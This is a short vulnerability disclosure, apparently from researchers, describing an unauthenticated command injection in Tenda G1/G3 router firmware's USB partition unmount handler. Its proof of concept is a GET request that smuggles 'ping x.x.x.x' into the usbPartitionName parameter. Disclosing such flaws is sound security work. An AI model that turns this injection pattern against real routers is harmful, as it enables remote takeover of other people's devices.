# tenda2
vendor:Tenda
product:G1,G3
version:V15.11.0.17(9502)\_CN(G1), V15.11.0.17(9502)\_CN(G3)
type:Remote Command Execution
author:Jinwen Zhou、Yifeng Li;
institution:potatso@scnu、feng@scnu
## Vulnerability description
We found an Command Injection vulnerability and buffer overflow vulnerability in Tenda Technology Tenda's **G1 and G3** routers with firmware which was released recently,allows remote attackers to execute arbitrary OS commands from a crafted GET request.
### Remote Command Injection vulnerability
In **formSetUSBPartitionUmount** function, the parameter **"usbPartitionName"** is not filter the string delivered by the user, so we can control the **usbPartitionName** such as **"aaa;ping x.x.x.x;"** to attack the OS.
![](https://i.imgur.com/ObqmAKK.png)
## PoC
### Remote Command Injection
We set the value of **usbPartitionName** as **aaa;ping x.x.x.x;** and the router will excute **ping** command.
```example.com/action/umountUSBPartition?usbPartitionName=aaa;ping x.x.x.x;```
![](https://i.imgur.com/0bhsuPh.png)